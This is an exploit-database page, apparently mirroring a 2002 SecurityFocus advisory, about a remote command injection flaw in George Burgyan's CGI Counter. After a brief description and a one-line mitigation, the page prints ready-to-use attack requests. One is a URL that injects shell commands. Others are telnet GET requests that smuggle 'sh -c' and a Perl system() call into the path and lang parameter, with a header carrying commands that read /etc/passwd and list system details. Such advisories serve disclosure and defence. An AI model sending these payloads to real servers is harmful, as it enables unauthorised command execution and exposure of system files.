header-logo
Suggest Exploit
vendor:
CGI Counter
by:
SecurityFocus
7.5
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: CGI Counter
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Unchecked Code in George Burgyan’s CGI Counter

Due to unchecked code that handles user input in George Burgyan's CGI Counter, remote execution of arbitrary commands at the same privilege level as the web server it is running on is possible. Examples of exploitation include sending a GET request to the target web server with a command in the HTTP_X header, or sending a GET request with a command in the lang parameter.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in any system commands.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1202/info

Due to unchecked code that handles user input in George Burgyan's CGI Counter, remote execution of arbitrary commands at the same privilege level as the web server it is running on is possible.

Examples:

http://target/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id

> telnet target www
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
X: pwd;ls -la /etc;cat /etc/passwd

> telnet target www
GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0
X: echo;id;uname -a;w

Navigation

Suggest Exploit

Services By CQR